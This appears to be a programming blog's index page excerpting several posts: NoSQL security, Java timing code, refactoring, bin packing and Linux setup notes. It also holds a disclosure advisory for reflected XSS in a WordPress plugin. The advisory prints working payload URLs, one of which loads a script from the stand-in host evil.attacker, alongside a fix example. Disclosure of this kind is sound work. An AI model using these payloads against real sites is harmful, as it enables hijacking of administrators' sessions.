MongoDB: NoSQL Injection & Security

A list of resources about NoSQL injection in general and PHP and MongoDB security specifically.

Intro: NoSQL Databases

NoSQL databases such as MongoDB are used more and more, but there isn’t a lot of information about the security of specific NoSQL databases or the security of NoSQL in general.

The prevailing assumption seems to be: it’s not SQL, so SQL injection is not possible, so it is secure. This is of course not true at all. The damage that can be achieved with NoSQL injection does seem to be smaller than that of SQL injection, but that does not mean that developers should not care about it.

Reflected XSS in WordPress Contact Form DB Plugin

  • Vulnerability: Reflected XSS
  • Affected Software: Contact Form DB (WordPress Plugin)
  • Affected Version: 2.8.17 (probably also prior versions)
  • Patched Version: 2.8.18
  • Risk: Medium
  • Vendor Contacted: 2014-11-17
  • Vendor Fix: 2014-11-19
  • Public Disclosure: 2014-11-26

Description

There are two reflected XSS vulnerabilities in the admin area of the Contact Form DB WordPress plugin. If an attacker can get an administrator to click on a specific link, this leads to the execution of arbitrary JavaScript in the administrator's browser, which in turn can for example lead to cookie theft.

Simple PoC

As single quotes are automatically escaped in WordPress, they cannot be used in the attack. It is still possible to inject a simple alert:

via submit_time:

http://localhost/wordpress/wp-admin/admin.php?page=CF7DBPluginSubmissions&form_name=Contact+form+1&submit_time=1416134948.8682" type="hidden"><script>alert(String.fromCharCode(88,83,83))</script><input name="1416134948.8682

via form_name:

http://localhost/wordpress/wp-admin/admin.php?page=CF7DBPluginSubmissions&form_name=Contact+form+1"><script>alert(String.fromCharCode(88,83,83));</script>

Exploiting the vulnerability

To get around the limitation of not using single quotes, an attacker can load a remotely hosted script:

http://localhost/wordpress/wp-admin/admin.php?page=CF7DBPluginSubmissions&form_name=Contact+form+1&submit_time=1416134948.8682" type="hidden"><script src=http://evil.attacker/myscript.js></script>
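The root cause described above is a value landing in a double-quoted HTML attribute with only single quotes escaped. The following Python sketch is an added illustration, not the plugin's code (which is not reproduced here): a hypothetical rendering that only backslash-escapes single quotes, beside one that applies HTML attribute encoding (the equivalent of WordPress's esc_attr()), plus a small check that counts the tags a browser would see.

```python
import html
import re

# Constructed sample input modelled on the form_name PoC above (not a live request).
ATTACKER_FORM_NAME = 'Contact form 1"><script>alert(String.fromCharCode(88,83,83));</script>'

def wp_style_slash_escape(value: str) -> str:
    """Mimic the single-quote escaping the advisory refers to (addslashes-like):
    only backslash, single quote and NUL are escaped. Double quotes and
    angle brackets pass through untouched."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace("\0", "\\0")

def render_vulnerable(form_name: str) -> str:
    """Hypothetical vulnerable template: the slashed value is dropped into a
    double-quoted attribute with no attribute encoding."""
    return f'<input name="form_name" value="{wp_style_slash_escape(form_name)}">'

def render_fixed(form_name: str) -> str:
    """Fix: encode for the HTML attribute context. html.escape with quote=True
    turns " into &quot; and < > into &lt; &gt;, so no breakout is possible."""
    return f'<input name="form_name" value="{html.escape(form_name, quote=True)}">'

# Rough tag matcher, good enough to count what a browser would parse as tags.
TAG_RE = re.compile(r"</?[a-zA-Z][^>]*>")

def count_tags(markup: str) -> int:
    """Number of tags in the rendered markup; the template itself has exactly one."""
    return len(TAG_RE.findall(markup))

def attribute_breakout(markup: str) -> bool:
    """True if untrusted input introduced tags beyond the template's single <input>."""
    return count_tags(markup) > 1

if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(ATTACKER_FORM_NAME))
    print("breakout?  ", attribute_breakout(render_vulnerable(ATTACKER_FORM_NAME)))
    print("fixed:     ", render_fixed(ATTACKER_FORM_NAME))
    print("breakout?  ", attribute_breakout(render_fixed(ATTACKER_FORM_NAME)))
```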

Java Timing Code: Compare Execution Times of Methods

Often you will have two Java functions and want to know which one performs better. You can use this Java class to time multiple methods and find out which one is faster.

Example Usage: Java Timing Code

Let’s say you have these two functions and want to know which one is faster:

public static String function1(String i) {
    return i + i;
}

public static String function2(String i) {
    StringBuilder sb = new StringBuilder();
    sb.append(i);
    sb.append(i);
    return sb.toString();
}

Here is how you would use my timing class:

public static void simpleTimingTest() throws Exception {
    Timing t = new Timing();

    /*
    The timing function will run the tests in chunks.
    For each chunk, the same input will be used.

    Input will be gathered via the passed IntFunction. The timing method will
    pass the current index (going from 0 to amountRunsPerChunk) to it and will expect
    any return of the defined type.
    */
    IntFunction<String> inputProvider = i -> String.valueOf(i);

    /*
    The add method expects two functions: the above mentioned input provider,
    as well as a function which accepts the output from the input provider as input
    and applies it to the function which will be timed.
    */
    t.add((String s) -> function1(s), inputProvider, "function1 ");
    t.add((String s) -> function2(s), inputProvider, "function2 ");

    t.time(true); // true: force test (otherwise, time might throw an exception
                  // if it suspects that there isn't enough memory)
    t.output(s -> System.out.println(s), Timing.Sort.ASC);
}

You can also do more complex things with it:

public static void predefinedInputTimingTest() throws Exception {
    Timing t = new Timing();
    /*
    The input doesn't have to be generated using the passed index, you could
    also use predefined input to time your functions:
    */
    String[] input = new String[]{"input1", "another input", "more input"};
    IntFunction<String> inputProvider = i -> input[i % input.length];
    t.add((String s) -> function1(s), inputProvider, "function1 ");
    t.add((String s) -> function2(s), inputProvider, "function2 ");

    /*
    You can decide what should be reported when timing finished:
    */
    t.setReport(EnumSet.of(Timing.Report.NAME, Timing.Report.MEAN));
    t.setAmountChunks(1_500);
    t.setAmountRunsPerChunk(2_500);
    t.time(true, s -> System.out.println(s)); // pass String -> String function to report debug information
    t.output(s -> System.out.println(s), Timing.Sort.ASC);
}

Refactoring Deeply Nested if Statements

Deeply nested if statements are a pain to read and maintain, so you should try to avoid them as much as possible. Here are a couple of suggestions on how to reduce deeply nested if statements to a more manageable size.

Most of these suggestions can be applied to most languages that have an if statement, at least most object-oriented or procedural languages. But my main focus when writing this was Java and PHP.

Early Return

Early returns should be used a lot more often by pretty much everybody. It’s one of the easiest ways to avoid or reduce deeply nested if statements and one of the first things I would look for when refactoring code.

The main idea is that when checking a value, the negative case is moved up-front, the error handled, and then the method is exited:

boolean test1 = ...;
if (test1) {
    boolean test2 = ...;
    if(test2) {
        boolean test3 = ...;
        if(test3) {
            // do the stuff
        } else {
            // some error, handle it
        }
    } else {
        // something else
    }
} else {
    // some other error, handle it
}
return;

Here, you can move the checks to the top of the method and remove three levels of nested if statements:

boolean test1 = ...;
if(!test1) {
    // some other error, handle it
    return;
}
boolean test2 = ...;
if(!test2) {
    // something else
    return;
}
boolean test3 = ...;
if(!test3) {
    // some error, handle it
    return;
}
// do the stuff
return;

Refactoring Simple Boolean Checks in if-Statements

How to refactor simple boolean checks in if statements and avoid bad practices. This is the first post out of a number of posts dealing with refactoring. This particular post is aimed at beginners, but further posts will contain somewhat more advanced concepts. The concepts presented here can be used in a lot of programming languages, but the article is written with Java, PHP, and JavaScript in mind. For one-liners, the general formatting will look like this:

Bin Packing Algorithm (Java)

In this post I will present example Java code for solving the Bin Packing Problem. I will not go into what exactly Bin Packing is, as there are enough websites that do a good job describing it. As always, Wikipedia is a good start to get a general overview: Wikipedia Bin Packing Problem.

  • Bin Packing: Brute Force Solution
  • Bin Packing: First Fit Decreasing Algorithm
  • Download Source Code for Bin Packing Problem

Bin Packing: Brute Force Solution

To check all possible solutions for the bin packing problem (brute force), a recursive approach can be used: iterate over all bins, try to put the current item in the bin and, if it fits, call the same method with the next item.

Linux Mint: Remove PPA

Linux Mint does not provide the option to remove a PPA. If you try it, this will be the result:

sudo add-apt-repository --remove ppa:somePPA/ppa
Usage: add-apt-repository [options] repository

add-apt-repository: error: no such option: --remove

But you can still manually remove a PPA in Linux Mint by removing the file that defines it. All PPAs are defined in /etc/apt/sources.list.d. So you can do the following:

# find the correct ppa file to delete by listing all ppa files:
ls /etc/apt/sources.

Comparison of Free UML Tools

There is a lot of different UML modelling software to choose from. Here, I will give a short overview of the most common free UML tools. This list is not meant as an exhaustive review, but more to give you an idea of what each of the tools can do, so you have an easier time choosing the UML tool that is best for you.

  • Gaphor
  • ArgoUML
  • Dia
  • Violet UML Editor
  • UMLet
  • yEd
  • Papyrus
  • Modelio
  • Further free UML Modelling Software
  • What’s the best free UML tool?

Linux: Installing Ruby on Rails

The official Ruby on Rails documentation has a good guide on how to install Ruby on Rails. I still had some problems setting everything up, so here I will describe how I installed Ruby on Rails on Linux (LMDE).

Installing Ruby on Linux

Before installing Ruby on Rails we need to install Ruby as well as RubyGems and SQLite:

sudo apt-get install ruby rubygems sqlite3

Installing Ruby on Rails on Linux

sudo gem install rails -V

-V because otherwise you will get no direct feedback.

Installing QGIS on LMDE (Linux Mint Debian Edition)

The solution that I found for installing QGIS (Quantum GIS) on LMDE (Linux Mint Debian Edition) is not optimal, but the only one that worked for me. I am getting QGIS directly from the QGIS Debian repository and I am temporarily adding the main Debian repository to my sources, because QGIS depends on some packages that are not included in LMDE.

LMDE: Install QGIS

Add QGIS to your sources.